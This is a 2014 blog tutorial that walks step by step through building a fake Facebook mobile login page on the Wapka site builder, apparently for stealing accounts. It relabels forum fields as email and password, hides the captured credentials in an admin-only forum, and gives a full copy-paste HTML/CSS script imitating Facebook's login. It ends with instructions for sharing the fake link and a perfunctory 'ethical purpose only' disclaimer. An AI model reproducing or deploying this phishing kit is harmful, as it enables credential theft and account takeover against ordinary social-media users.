how to make a phishing page in wapka

Posted by : Niraj lathiya Saturday 22 March 2014

Hack Facebook Accounts Using Mobile: Mobile Phishing Using Wapka 2013

Unlike Web phishing, a web hosting with PHP support is not necessary for mobile phishing. There is a more easy way to do this. Wapka.Mobi is a free "wap" site builder that has some awesome features like Forum, Chat, Inbox etc. that can be used in many different ways to fit our needs, so in this tutorial i'll show you how you can use a Wapka Forum to make a Fake facebook page.

Step 1: Go to http://wapka.mobi and create a new account or login if you already have one.

Step 2:

In the Site List, click on Manage beside your desired site.

Step 3:

Now in the Basic Settings click on Edit texts.

These are the default texts of your site that appear on auto-created pages like login, registration, chat, inbox etc. you can rename these labels here.

Step 4:

Choose forum/chat to edit text labels of Forum and Chat modules.

Step 5:

Change these three texts as shown below:

Name to E-mail or Phone
Text to Password
Submit to Log In

Labels in Black are the original texts and the blue ones are the new texts.

This step is necessary to make the forum post look like facebook login page. The name field will work as the E-mail or Username input box, the Text field will work as the Password input box and the Submit button is going to be our Login button. Yes that's how we make people fool ;-)

Step 6:

Go back to the Manage Site again and go to Admin mode.

Step 7:

Go to :: EDIT SITE (#) ::

Step 8:

Click on Forum to create a new forum. This is where all the E-mails and Passwords will be stored.

Step 9:

Create a new forum, don't change any settings, create it as shown below.

Step 10:

After creating the forum you will see a page where all your created forums would be listed.
Click on the forum that you created in previous step to open it.

Step 11:

On the forum page note down the forum ID number. Each forum has a unique ID number. Copy and save the ID number, we will need it later.

Now again click on the :: EDIT SITE (#) :: link on the forum page, and go to Edit Site > Users > Item Visibility.

Step 12:

By default the above created forum will be visible to everyone. Since our E-mails and passwords are going to be stored in this forum we need to make it private.

Set the visibility to X to make it visible for Admin only.

Step 13:

Go back to the main site (as you did in Step 7) and then go to :: EDIT SITE (#) :: in the forum.
Now select WML/XHTML code to add the Facebook Mobile Phishing Script.

Step 14:

Copy the Facebook Mobile Phishing Script from the box and paste it into the WML/XHTML code box.

<link rel="shortcut icon" href="http://wfs01.wapka.mobi/4978/4978439_ab81f0b488.png" />
<style type="text/css">
.nontouch ._5ruq{border:solid 1px #999;font-size:medium;width:89%}
#root._5t66{background-color:#395a99;color:#fff}
#root._5t66 a{color:#fff}
._5t67{padding:56px 36px 0 36px;text-align:center}._5so8 #header td{padding:2px;vertical-align:middle}
._5so8 .other-links{line-height:2em}
._5so8 .button_area .btnC{color:#fff}
._5so8 .button_area .btnR{background-color:#b9b9b9;color:#000}
._5so8 .button_area .btnR:hover{background-color:#999;color:#000}
._5so9 div.button_area{width:89%}
._5so9 #form_fields > div > div{padding:0 3px 0 0}
._5so9 .button_area .largeBtn{padding:5px}
._4u99{color:#87898c;font-size:13px;font-weight:700;padding:5px 0 0 4px}.nontouch ._4g33{border:0;border-collapse:collapse;margin:0;padding:0;width:100%}
.nontouch ._4g33 tbody, .nontouch ._52wc > tr > td, .nontouch ._52wc > tbody > tr > td, .nontouch ._4g33 td._52wc, .nontouch ._52wf > tr > td, .nontouch ._52wf > tbody > tr > td, .nontouch ._4g33 td._52wf{vertical-align:top}
.nontouch ._52wd > tr > td, .nontouch ._52wd > tbody > tr > td, .nontouch ._4g33 td._52wd{vertical-align:bottom}
.nontouch ._52we > tr > td, .nontouch ._52we > tbody > tr > td, .nontouch ._4g33 td._52we{vertical-align:middle}
.nontouch ._4g33 td{padding:0}
.nontouch ._4g33 td._55wq{padding:2px}
.nontouch ._4g33 td._55wr{padding:4px}
.nontouch ._4g33 td._55ws{padding:6px}
.nontouch ._4g33 td._56hq{padding:8px}
.nontouch ._4g34{width:100%}form{margin:0;border:0}.nontouch ._55wp{padding:0}
.nontouch ._55wq{padding:2px}
.nontouch ._55wr{padding:4px}
.nontouch ._55ws{padding:6px; width: 89%;}
.nontouch ._56hq{padding:8px}._52j9{color:#adb2bb}
._52ja{color:#6a7180}
._52jb{color:#141823}
.touched ._592p ._52j9, .touched ._592p._52j9, .touched._592p ._52j9, .touched._592p._52j9, .touched ._592p ._52ja, .touched ._592p._52ja, .touched._592p ._52ja, .touched._592p._52ja, .touched ._592p._52jb, .touched._592p ._52jb, .touched ._592p ._52jb, .touched._592p._52jb, .touched ._592p, .touched._592p{color:#fff}
._56bq{font-size:11px;line-height:16px;text-transform:uppercase}
._52jc{font-size:12px;line-height:16px}
._52jd{font-size:14px;line-height:20px}
._52je{font-size:16px;line-height:20px}
._52jf{font-size:18px;line-height:24px}
._52jg{font-weight:normal}
._52jh{font-weight:bold}
._52ji{text-align:left}
._52jj{text-align:center}
._52jk{text-align:right}._56bg{border:0;display:block;margin:0;padding:0}.btn{border:solid 2px;cursor:pointer;margin:0;padding:2px 6px 3px;text-align:center}
.btn.largeBtn{display:block}
button.largeBtn,
input.largeBtn{width:100%}
.btnForm{display:inline;border:none;padding:0}
.btnD,
.acb .btnC,
.btnI,
.nontouch a.btnD,
.nontouch .acb a.btnC,
.nontouch a.btnI{background:#f3f4f5;border-color:#ccc #aaa #999;color:#505c77}
.acb .btnD,
.btnC,
.acb .btnI,
.nontouch .acb a.btnD,
.nontouch a.btnC,
.nontouch a.btnC:visited,
.nontouch .acb a.btnI{background:#3b5998;border-color:#8a9ac5 #29447E #1a356e;color:#fff}
.nontouch .btnC.disabled{color:#9dabce}
.btnS,
.nontouch a.btnS,
.nontouch a.btnS:visited{background:#69a74e;border-color:#98c37d #3b6e22 #2c5115;color:#fff}
.btnN,
.nontouch a.btnN,
.nontouch a.btnN:visited{background:#ee3f10;border-color:#f48365 #8d290e #762610;color:#fff}
.btn .img{pointer-events:none}.btn,
.btnForm{display:inline-block}
.btn + .btn,
.btnForm + .btnForm,
.btn + .btnForm,
.btnForm + .btn{margin-left:3px}
.largeBtn + .largeBtn{margin-left:0;margin-top:6px}
.btn input{background:none;border:none;margin:0;padding:0}
.btnD input,
.acb .btnC input,
.btnI input{color:#505c77}
.acb .btnD input,
.btnC input,
.acb .btnI input,
.btnS input,
.btnN input{color:#fff}.nontouch a,
.nontouch a:visited{color:#3b5998;text-decoration:none}
.nontouch .sub,
.nontouch .sub:visited{color:gray}
.nontouch .sec,
.nontouch .sec:visited{color:#6d84b4}
.nontouch .inv,
.nontouch .inv:visited{color:#fff}.nontouch a:focus,
.nontouch a:hover,
.nontouch .sub:focus,
.nontouch .sub:hover,
.nontouch .sec:focus,
.nontouch .sec:hover{background-color:#3b5998;color:#fff}
.nontouch .inv:focus,
.nontouch .inv:hover,
.nontouch .inv:hover .fcy,
.nontouch .inv:focus .fcy{background-color:#fff;color:#3b5998}._5pkb, ._5pkc{margin:0}
._5pkb li, ._5pkc li{display:block;list-style:none}body{text-align:left;direction:ltr}
body, tr, input, textarea, button{font-family:sans-serif}
body,
p, figure,
h1, h2, h3, h4, h5, h6,
ul, ol, li, dl, dd, dt{margin:0;padding:0}
h1, h2, h3, h4, h5, h6{font-size:1em;font-weight:bold}
ul, ol{list-style:none}._513c #viewport{margin:0 auto;max-width:600px}.acw{background-color:#fff}
.acbk{background-color:#000}
.acb{background-color:#3b5998}
.aclb{background-color:#eceff5}
.acdb{background-color:#31394a}
.acg{background-color:#f2f2f2}
.acy{background-color:#fffbe2;color:#7f7212}
.acr{background-color:#ffebe8;color:#6d220d}#page{position:relative}.aps{padding:2px 3px}
.apm{padding:4px 3px}
.apl{padding:6px 3px}.lr{width:100%}
.lr .r{text-align:right}.img{border:0;display:inline-block;vertical-align:top}
i.img u{position:absolute;width:0;height:0;overflow:hidden}.nontouch ._5ui2{background:#eceff5}
.nontouch ._5ui2 a, .nontouch ._5ui2 a:visited{color:#2b55ad}
.nontouch ._5ui2 a:hover, .nontouch ._5ui2 a:focus{background:#2b55ad;color:#fff}
.nontouch ._5ui3, .nontouch ._5ui4{padding:0 6px 6px}
.nontouch ._5ui5{border-top:1px solid #dfe2e8;padding:3px}.fcb{color:#000}
.fcg{color:gray}
.fcw{color:#fff}
.fcl{color:#3b5998}
.fcs{color:#6d84b4}.mfsxs{font-size:x-small}
.mfss{font-size:small}
body, tr, input, textarea, .mfsm{font-size:medium}
.mfsl{font-size:large}

input[type="text"]{padding: 2px; border: 1px solid rgb(153, 153, 153);
font-size: medium;
width: 89%; display: block;
margin: 0px; font-family: sans-serif; }

input[type="submit"]{ padding: 5px; color: rgb(255, 255, 255); display: block; width: 89%; background: none repeat scroll 0% 0% rgb(59, 89, 152);
border-color: rgb(138, 154, 197) rgb(41, 68, 126) rgb(26, 53, 110); border: 2px solid;
cursor: pointer;
margin: 0px;
text-align: center; font-size: medium;}

.acy.aps.abb {
border-bottom: 1px solid;
border-color: rgb(226, 200, 34);
}

</style>

<div tabindex="0" class="nontouch x1 ff _513c iframe acw">
<div class="mfsm">
<div id="viewport">
<div class="acb aps" id="header">
<table cellspacing="0" cellpadding="0" class="lr">
<tr><td valign="top"><h1>
<a href="/home.php?refid=8"><img src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yz/r/aKhO2tw3FnO.png" width="76" height="20" class="img" alt="facebook" /></a></h1>
</td>
<td valign="top" class="r"><a class="btn btnS" href="/r.php?refid=8">Facebook </a></td>
</tr>
</table>
</div>
<div id="objects_container">
<div id="root" role="main" class="_5so8 acw" data-sigil="context-layer-root content-pane">
<table class="_4g33"><tbody>
<tr><td class="_4g34">

<div class="acy aps abb">
  <p class="mfss">
You must log in first</p>
</div>
<div class="aclb _5rut">

:forum-110983050/smallform/0:

<div class="_4u99">
New to Facebook?</div>
<div class="_55ws button_area">
<a class="btn btnS largeBtn" href="https://www.facebook.com/?stype=lo&jlou=Afe9YZswj9b10UgLM7R1B2otYcitYsxttJC_XZUm-UJwRh0Y-PPIUzytDm4XGCvOGGJifBoGJOsdgnP1-Vl4HhTW3Wyr2J31Kbs5V08RPoSgPw&smuh=42822&lh=Ac-mIr_vpizeb2e4&aik=TD2a0tK0HJKLHuDesf2-dQ">Create New Account</a></div>
<div class="_55ws other-links">
<span class="_52ja _52je"><ul class="_5pkb _55wp">
<li class="_55wq"><a href="https://www.facebook.com/?stype=lo&jlou=Afe9YZswj9b10UgLM7R1B2otYcitYsxttJC_XZUm-UJwRh0Y-PPIUzytDm4XGCvOGGJifBoGJOsdgnP1-Vl4HhTW3Wyr2J31Kbs5V08RPoSgPw&smuh=42822&lh=Ac-mIr_vpizeb2e4&aik=TD2a0tK0HJKLHuDesf2-dQ">Forgot password?</a></li>
<li class="_55wq"></li>
<li class="_55wq"><a href="/help/?refid=8">Help Center</a></li>
<li class="_55wq"></li>
</ul>
</span></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div class="_52jc _5ui2">
<div id="footer">
<div class="_5ui3">
<span class="mfss fcg"><b>English (US)</b><span role="separator" aria-hidden="true"> · </span><a class="sec" href="/a/language.php?l=es_LA&lref=https%3A%2F%2Fhttps://www.facebook.com/?stype=lo&jlou=Afe9YZswj9b10UgLM7R1B2otYcitYsxttJC_XZUm-UJwRh0Y-PPIUzytDm4XGCvOGGJifBoGJOsdgnP1-Vl4HhTW3Wyr2J31Kbs5V08RPoSgPw&smuh=42822&lh=Ac-mIr_vpizeb2e4&aik=TD2a0tK0HJKLHuDesf2-dQ">Español</a><span role="separator" aria-hidden="true"> · </span><a class="sec" href="/a/language.php?l=pt_BR&lref=https%3A%2F%2Fhttps://www.facebook.com/?stype=lo&jlou=Afe9YZswj9b10UgLM7R1B2otYcitYsxttJC_XZUm-UJwRh0Y-PPIUzytDm4XGCvOGGJifBoGJOsdgnP1-Vl4HhTW3Wyr2J31Kbs5V08RPoSgPw&smuh=42822&lh=Ac-mIr_vpizeb2e4&aik=TD2a0tK0HJKLHuDesf2-dQ">Português (Brasil)</a><span role="separator" aria-hidden="true"> · </span><a class="sec" href="/language.php?n=https%3A%2F%2Fm.facebook.com%2F&refid=8">More…</a></span></div>
<div class="_5ui4">
<span class="mfss fcb">Facebook ©2014</span></div>
</div>
</div>
</div>
<div id="static_templates">
</div>
</div>
</div>
<br/>

Step 15:

Search for :forum-XXXXXXX/smallform/0: in the script (Press CTRL + F9 If you're on a PC), replace XXXXXXX with the forum ID number, and then hit Submit button.

Step 16:

Our phishing page is almost ready, now it just needs some final touch-ups ;-)
Go to :: EDIT SITE (#) :: > Global Settings > HEAD tags (meta,style,...), and enter following codes :

<link rel="shortcut icon" href="http://wfs01.wapka.mobi/4978/4978439_ab81f0b488.png" />

It is the favicon code, it adds the little facebook icon in the browser tab.

Step 17:

This is the last step, Go to :: EDIT SITE (#) :: > Change title
and add the following settings:

Set the Title name to Welcome to Facebook, and URL (site_0.xhtml) to facebook.

That's it! your Facebook mobile phishing script is ready! you can see all the stored password by going into Admin mode > Forum.
Since my forum's name is FB site, i would go to Admin mode > FB Site to see the stored passwords.

To share the link of fake facebook page use:

http://abc.wapka.mobi

where abc is your sub-domain name or username.

This is how it looks like:

Left one is the real Facebook Mobile page and the right one is the Fake Page. Close enough ha? ;-)

Tell your friends about this by comment on post and share on social sites

Please Note: This post for ethical purpose only. You should not use it to harm anyone. Hacker's World ( Niraj Lathiya ) will not be responsible for any harm caused to anyone by this tutorial.